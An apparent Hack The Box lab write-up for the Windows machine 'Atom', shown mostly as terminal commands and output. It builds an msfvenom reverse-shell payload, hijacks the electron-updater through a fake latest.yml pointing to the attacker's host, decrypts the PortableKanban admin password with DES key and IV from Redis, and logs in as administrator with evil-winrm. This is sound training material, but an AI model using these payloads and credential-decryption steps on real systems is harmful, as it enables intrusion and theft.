HTB Atom done
Atom
OS:
Windows
Technology:
Redis
IP Address:
10.10.10.237
Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6379/tcp open redis Redis key-value store
7680/tcp open pando-pub?
Users and pass:
From config file: PortableKanban.cfg
P(enc): Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb
P: kidvscat_yes_kidvscat
---
After decrypt via Cyberchef
L: administrator
P(dec): kidvscat_admin_@123
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.10.237_nmap 10.10.10.237 ; cat 10.10.10.237_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-12 09:55 CEST
Nmap scan report for 10.10.10.237
Host is up (0.047s latency).
Not shown: 65528 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Heed Solutions
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Heed Solutions
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6379/tcp open redis Redis key-value store
7680/tcp open pando-pub?
Open website: http://10.10.10.237
http://10.10.10.237/
Download file: heed_setup
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Atom/heed_windows]
└─$ wget http://10.10.10.237/releases/heed_setup_v1.0.0.zip
--2024-04-12 10:30:41-- http://10.10.10.237/releases/heed_setup_v1.0.0.zip
Connecting to 10.10.10.237:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46566143 (44M) [application/zip]
Saving to: ‘heed_setup_v1.0.0.zip’
heed_setup_v1.0.0.zip 100%[==============================================>] 44.41M 1.65MB/s in 28s
2024-04-12 10:31:10 (1.61 MB/s) - ‘heed_setup_v1.0.0.zip’ saved [46566143/46566143]
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Atom/heed_windows]
└─$ unzip heed_setup_v1.0.0.zip -d heed_unzip
Archive: heed_setup_v1.0.0.zip
inflating: heed_unzip/heedv1 Setup 1.0.0.exe
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Atom/heed_windows/heed_unzip]
└─$ cd heed_setup
┌──(kali㉿pentest)-[/mnt/…/HTB_Atom/heed_windows/heed_unzip/heed_setup]
└─$ 7z x ../heedv1\ Setup\ 1.0.0.exe 1>/dev/null && ls
'$PLUGINSDIR' 'Uninstall heedv1.exe'
┌──(kali㉿pentest)-[/mnt/…/HTB_Atom/heed_windows/heed_unzip/heed_setup]
└─$ cd '$PLUGINSDIR/'
┌──(kali㉿pentest)-[/mnt/…/heed_windows/heed_unzip/heed_setup/$PLUGINSDIR]
└─$ ls
app-64.7z nsis7z.dll nsProcess.dll SpiderBanner.dll StdUtils.dll System.dll WinShell.dll
┌──(kali㉿pentest)-[/mnt/…/heed_windows/heed_unzip/heed_setup/$PLUGINSDIR]
└─$ mkdir app-64 && cd app-64 && 7z x ../app-64.7z 1>/dev/null && ls
chrome_100_percent.pak libEGL.dll resources VkLayer_core_validation.dll
chrome_200_percent.pak libGLESv2.dll resources.pak VkLayer_object_tracker.dll
d3dcompiler_47.dll LICENSE.electron.txt snapshot_blob.bin VkLayer_parameter_validation.dll
ffmpeg.dll LICENSES.chromium.html swiftshader VkLayer_threading.dll
heedv1.exe locales v8_context_snapshot.bin VkLayer_unique_objects.dll
icudtl.dat natives_blob.bin VkICD_mock_icd.dll
┌──(kali㉿pentest)-[/mnt/…/heed_unzip/heed_setup/$PLUGINSDIR/app-64]
└─$ cd resources
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ ls
app.asar app-update.yml electron.asar elevate.exe inspector
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ npx @electron/asar extract app.asar app.asar_unpack
Read config files
We see interesing stuff in main.js, module electron-updater, we looking for exploit
const {autoUpdater} = require("electron-updater");
---
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ cat app-update.yml
provider: generic
url: 'http://updates.atom.htb'
publisherName:
- HackTheBox
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ cd app.asar_unpack
┌──(kali㉿pentest)-[/mnt/…/$PLUGINSDIR/app-64/resources/app.asar_unpack]
└─$ cat main.js
const {app, BrowserWindow, Menu, protocol, ipcMain} = require('electron');
const log = require('electron-log');
const {autoUpdater} = require("electron-updater");
const path = require('path');
autoUpdater.logger = log;
autoUpdater.logger.transports.file.level = 'debug';
let win;
let addWindow;
function createNote(){
addWindow = new BrowserWindow({
webPreferences: {
nodeIntegration: true,
},
width: 500,
height: 200,
title: "Create Note"
});
addWindow.loadURL(`file://${__dirname}/createNote.html`);
return addWindow;
}
const template = [
{
label : "File",
submenu:[
{
label: "Create Note",
click(){
createNote();
}
},
{
label: "Delete Notes",
click(){
win.webContents.send('note:clear');
}
},
{
label: "Quit",
click(){
app.quit();
}
}
]
}
];
function sendStatusToWindow(text) {
log.info(text);
win.webContents.send('message', text);
}
function createDefaultWindow() {
win = new BrowserWindow({
webPreferences: {
nodeIntegration: true,
},
icon: path.join(__dirname, 'icons/ico.png')
});
win.loadURL(`file://${__dirname}/version.html#v${app.getVersion()}`);
win.on('closed', function(){
app.quit();
});
return win;
}
app.on('ready', function() {
// Create the Menu
const menu = Menu.buildFromTemplate(template);
Menu.setApplicationMenu(menu);
createDefaultWindow();
});
ipcMain.on('note:add', function(e, note){
win.webContents.send('note:add', note);
addWindow.close();
})
autoUpdater.on('checking-for-update', () => {
sendStatusToWindow('Checking for update...');
})
autoUpdater.on('update-available', (ev, info) => {
sendStatusToWindow('Update available.');
})
autoUpdater.on('update-not-available', (ev, info) => {
sendStatusToWindow('Update not available.');
})
autoUpdater.on('error', (ev, err) => {
sendStatusToWindow('Error in auto-updater.');
})
autoUpdater.on('download-progress', (ev, progressObj) => {
sendStatusToWindow('Download progress...');
})
autoUpdater.on('update-downloaded', (ev, info) => {
sendStatusToWindow('Update downloaded; Installing the update...');
});
app.on('window-all-closed', () => {
app.quit();
});
autoUpdater.on('update-downloaded', (ev, info) => {
autoUpdater.quitAndInstall();
})
app.on('ready', function() {
autoUpdater.checkForUpdates();
});
Exploit - Bypass Leading to RCE in Electron-Updater
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
Create payload with msfvenom
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe -o "payload'.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: payload'.exe
Calculate payload'.exe's sha512 hash
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ shasum -a 512 payload\'.exe | cut -d " " -f1 | xxd -r -p | base64 -w0
D7jHTpKXzFirs6C52vLrvO4Cijrpo50DvBGEpJlKCHir8dnheoOa2N+POIt+iefy0pcnKRd8AKT9qwILRWe//Q==
Create fake latest.yml
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ cat latest.yml
version: 1.2.3
path: http://10.10.14.6/payload'.exe
sha512: D7jHTpKXzFirs6C52vLrvO4Cijrpo50DvBGEpJlKCHir8dnheoOa2N+POIt+iefy0pcnKRd8AKT9qwILRWe//Q==
releaseDate: '2024-04-12T10:16:01.627Z'
Run python webserver
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Upload file to smb folder
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ smbclient -N //10.10.10.237/Software_Updates -c 'put latest.yml client1/latest.yml; put latest.yml client2/latest.yml; put latest.yml client3/latest.yml'
putting file latest.yml as \client1\latest.yml (1.6 kb/s) (average 1.6 kb/s)
putting file latest.yml as \client2\latest.yml (1.2 kb/s) (average 1.4 kb/s)
putting file latest.yml as \client3\latest.yml (1.3 kb/s) (average 1.4 kb/s)
Run netcat on port 4444
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.237] 49241
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
atom\jason
C:\WINDOWS\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
atom\jason S-1-5-21-1199094703-3580107816-3092147818-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
ERROR: Unable to get user claims information.
C:\WINDOWS\system32>
Read flag: user.txt
C:\WINDOWS\system32>cd C:\USers
cd C:\USers
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users
04/01/2021 03:53 AM <DIR> .
04/01/2021 03:53 AM <DIR> ..
04/13/2021 02:41 AM <DIR> Administrator
04/13/2021 02:35 AM <DIR> jason
04/01/2021 04:49 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 5,474,402,304 bytes free
C:\Users>cd jason
cd jason
C:\Users\jason>cd Desktop
cd Desktop
C:\Users\jason\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users\jason\Desktop
04/02/2021 10:29 PM <DIR> .
04/02/2021 10:29 PM <DIR> ..
03/31/2021 02:09 AM 2,353 heedv1.lnk
03/31/2021 02:09 AM 2,353 heedv2.lnk
03/31/2021 02:09 AM 2,353 heedv3.lnk
04/12/2024 12:54 AM 34 user.txt
4 File(s) 7,093 bytes
2 Dir(s) 5,474,402,304 bytes free
C:\Users\jason\Desktop>type user.txt
type user.txt
44627baaa8544990c1401e435e323ce6
PortableKanban
Read config from config file: PortableKanban.cfg
We get password to Redis DB
---
C:\Users\jason\Desktop>cd ../Downloads/
cd ../Downloads/
C:\Users\jason\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users\jason\Downloads
04/02/2021 08:00 AM <DIR> .
04/02/2021 08:00 AM <DIR> ..
03/31/2021 02:36 AM <DIR> node_modules
04/02/2021 08:21 PM <DIR> PortableKanban
0 File(s) 0 bytes
4 Dir(s) 5,473,034,240 bytes free
C:\Users\jason\Downloads>cd PortableKanban
cd PortableKanban
C:\Users\jason\Downloads\PortableKanban>type PortableKanban.cfg
type PortableKanban.cfg
{"RoamingSettings":{"DataSource":"RedisServer","DbServer":"localhost","DbPort":6379,"DbEncPassword":"Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb","DbServer2":"","DbPort2":6379,"DbEncPassword2":"","DbIndex":0,"DbSsl":false,"DbTimeout":10,"FlushChanges":true,"UpdateInterval":5,"AutoUpdate":true,"Caption":"My Tasks","RightClickAction":"Nothing","DateTimeFormat":"ddd, M/d/yyyy h:mm tt","BoardForeColor":"WhiteSmoke","BoardBackColor":"DimGray","ViewTabsFont":"Segoe UI, 9pt","SelectedViewTabForeColor":"WhiteSmoke","SelectedViewTabBackColor":"Black","HeaderFont":"Segoe UI, 11.4pt","HeaderShowCount":true,"HeaderShowLimit":true,"HeaderShowEstimates":true,"HeaderShowPoints":false,"HeaderForeColor":"WhiteSmoke","HeaderBackColor":"Gray","CardFont":"Segoe UI, 11.4pt","CardLines":3,"CardTextAlignment":"Center","CardShowMarks":true,"CardShowInitials":false,"CardShowTags":true,"ThickTags":false,"DefaultTaskForeColor":"WhiteSmoke","DefaultTaskBackColor":"Gray","SelectedTaskForeColor":"WhiteSmoke","SelectedTaskBackColor":"Black","SelectedTaskFrames":false,"SelectedTaskFrameColor":"WhiteSmoke","SelectedTaskThickFrames":false,"WarmTasksThreshold":0,"WarmTaskForeColor":"WhiteSmoke","WarmTaskBackColor":"MediumBlue","WarmTaskFrameColor":"Goldenrod","HotTasksThreshold":1,"HotTaskForeColor":"WhiteSmoke","HotTaskBackColor":"Blue","HotTaskFrameColor":"Yellow","OverdueTaskForeColor":"WhiteSmoke","OverdueTaskBackColor":"OrangeRed","OverdueTaskFrameColor":"OrangeRed","WarmHotTaskFrames":false,"WarmHotTaskThickFrames":false,"BusinessDaysOnly":false,"TrackedTaskForeColor":"WhiteSmoke","TrackedTaskBackColor":"Red","ShowSubtasksInEditBox":true,"CheckForDuplicates":true,"WarnBeforeDeleting":true,"ProgressIncrement":5,"DisableCreated":false,"DefaultPriority":"Low","DefaultDeadlineTime":"PT0S","ShowTaskComments":true,"IntervalFormat":"Hours","WorkUnitDuration":1,"SelectAnyColumn":false,"ShowInfo":true,"CardInfoFont":"Segoe UI, 9pt","InfoTextAlignment":"Center","InfoShowPriority":true,"InfoShowTopic":true,"InfoShowPerson":true,"InfoShowCreated":true,"InfoShowDeadlineCompleted":true,"InfoShowSubtasks":false,"InfoShowEstimate":false,"InfoShowSpent":false,"InfoShowPoints":false,"InfoShowProgress":true,"InfoShowCommentsCount":false,"InfoShowTags":false,"InfoShowCustomFields":false,"ShowToolTips":true,"ToolTipShowText":true,"ToolTipTextLimit":200,"ToolTipShowPriority":true,"ToolTipShowTopic":true,"ToolTipShowPerson":true,"ToolTipShowCreated":false,"ToolTipShowDeadlineCompleted":true,"ToolTipShowSubtasks":true,"ToolTipShowEstimate":true,"ToolTipShowSpent":true,"ToolTipShowPoints":true,"ToolTipShowProgress":true,"ToolTipShowCommentsCount":false,"ToolTipShowTags":false,"ToolTipShowCustomFields":false,"TimerWorkInterval":25,"TimeShortBreakInterval":5,"TimerLongBreakInterval":15,"PlaySound":1000,"ActivateWindow":false,"TaskBarProgress":true,"EnableTimeTracking":true,"AlertOnNewTask":false,"AlertOnModifiedTask":false,"AlertOnCompletedTask":false,"AlertOnCanceledTask":false,"AlertOnReassignedTask":false,"AlertOnMovedTask":false,"AlertOnDeletedTask":false,"AlertMethod":"None","EmailLogon":true,"EmailReviewMessage":true,"EmailSmtpPort":587,"EmailSmtpDeliveryMethod":"Network","EmailSmtpUseDefaultCredentials":false,"EmailSmtpEnableSSL":false,"EmailSmtpTimeout":5,"EmailAttachFile":true,"EmailNewTaskSubject":"PortableKanban Notification: New task has been created","EmailDeletedTaskSubject":"PortableKanban Notification: Task has been deleted","EmailEditedTaskSubject":"PortableKanban Notification: Task has been modified","EmailCompletedTaskSubject":"PortableKanban Notification: Task has been completed","EmailCanceledTaskSubject":"PortableKanban Notification: Task has been canceled","EmailReassignedTaskSubject":"PortableKanban Notification: Task has been reassigned","EmailMovedTaskSubject":"PortableKanban Notification: Task has been moved","EmailSignature":"This is automatic message.","PluginsSettings":{"bd5d2026e1f7424eab8690a62ad05ad2":{},"07a0d797c97c41f789af21ff4298754e":{"SourceColumnId":"00000000000000000000000000000000","DestinationColumnId":"00000000000000000000000000000000","Age":30},"2e470c79feb946f2b6e74b35245f8e80":{"FromDate":"\/Date(1617346800000-0700)\/","ToDate":"\/Date(1617346800000-0700)\/","IncludeTopics":false,"IncludeTags":false,"IncludeComments":false,"ReportType":"Html","SortByUser":true},"680986568fed41c381ef9f230feaa102":{"RunOnStartup":false},"24b7acead7984f8ab16bdb0ae8559fb6":{"TopicId":"00000000000000000000000000000000","ColumnId":"00000000000000000000000000000000","FromPersonId":"00000000000000000000000000000000","ToPersonId":"00000000000000000000000000000000"}},"AutoLogon":false,"LogonUserName":"","EncLogonPassword":"","ExitOnSuspend":false,"DropFilesFolder":"Files","UseRelativePath":true,"ConfirmFileDeleteion":true,"DefaultDropFilesActionOption":"Copy","CreateNewTaskForEachDroppedFile":true,"ParseDroppedEmails":true,"RestoreWindowsLocation":true,"DesktopShortcut":false,"DailyBackup":false,"BackupTime":"PT0S","BlockEscape":false,"BlackWhiteIcon":true,"ShowTimer":true,"ViewId":"00000000000000000000000000000000","SearchInSubtasks":false,"ReportIncludeComments":true,"ReportIncludeSubTasks":true,"ReportIncludeTimeTracks":true,"ReportIncludeCustomFields":true},"LocalSettingsMap":{"ATOM":{"Left":320,"Top":2,"Width":800,"Height":601,"Minimized":false,"Maximized":false,"FullScreen":false,"Hidden":false,"AboutBoxLeft":0,"AboutBoxTop":0,"AboutBoxWidth":0,"AboutBoxHeight":0,"EditBoxLeft":0,"EditBoxTop":0,"EditBoxWidth":0,"EditBoxHeight":0,"EditBoxSplitterOrientation":1,"EditBoxSplitterDistance":0,"EditBoxFontSize":0,"EditBoxCommentsSortDirection":"Ascending","ReportBoxLeft":370,"ReportBoxTop":27,"ReportBoxWidth":700,"ReportBoxHeight":551,"SetupBoxLeft":370,"SetupBoxTop":52,"SetupBoxWidth":700,"SetupBoxHeight":501,"ViewBoxLeft":0,"ViewBoxTop":0,"ViewBoxWidth":0,"ViewBoxHeight":0,"LogonBoxLeft":520,"LogonBoxTop":202,"LogonBoxWidth":400,"LogonBoxHeight":201}}}
---
Parse the output from Kali (jq)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ cat PortableKanban.cfg| jq . | head
{
"RoamingSettings": {
"DataSource": "RedisServer",
"DbServer": "localhost",
"DbPort": 6379,
"DbEncPassword": "Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb",
"DbServer2": "",
"DbPort2": 6379,
"DbEncPassword2": "",
"DbIndex": 0,
Redis
Read config files from Redis home folder
We found encrypted password to Redis
C:\>cd "C:\Program Files\Redis"
cd "C:\Program Files\Redis"
C:\Program Files\Redis>type *.conf | findstr pass
type *.conf | findstr pass
redis.windows-service.conf
redis.windows.conf
requirepass kidvscat_yes_kidvscat
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
# resync is enough, just passing the portion of data the slave missed while
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
# requirepass foobared
requirepass kidvscat_yes_kidvscat
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
# resync is enough, just passing the portion of data the slave missed while
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
# requirepass foobared
Connect to Redis
we found interesing thing
L: Administrator
P(enc): Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> keys
(error) ERR wrong number of arguments for 'keys' command
10.10.10.237:6379> keys *
1) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
2) "pk:ids:User"
3) "pk:ids:MetaDataClass"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
10.10.10.237:6379> get "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
"{\"Id\":\"ffffffffffffffffffffffffffffffff\",\"SchemaVersion\":\"4.2.0.0\",\"SchemaVersionModified\":\"\\/Date(1617420120000-0700)\\/\",\"SchemaVersionModifiedBy\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"SchemaVersionChecked\":\"\\/Date(-62135596800000-0000)\\/\",\"SchemaVersionCheckedBy\":\"00000000000000000000000000000000\",\"TimeStamp\":637530169345346438}"
10.10.10.237:6379> get "pk:ids:User"
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get "pk:ids:MetaDataClass"
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379>
Decrypt administrator's password
L: administrator
P(dec): kidvscat_admin_@123
CyberChef recipe
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)DES_Decrypt(%7B'option':'UTF8','string':'7ly6UznJ'%7D,%7B'option':'UTF8','string':'XuVUm5fR'%7D,'CBC','Raw','Raw')&input=T2RoN04zTDlhVlE4L3NyZFpnRzJoSVIwU1NKb0pLR2k
Remote login as administrator
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ evil-winrm -i 10.10.10.237 -u administrator -p 'kidvscat_admin_@123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/12/2024 12:54 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
41219815ce7d5099ba65fd39022b53c2
References
[Signature Validation Bypass Leading to RCE In Electron-Updater](https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html)
[PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval](https://www.exploit-db.com/exploits/49409)
[CyberChef recipe - Redis](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)
Lessons Learned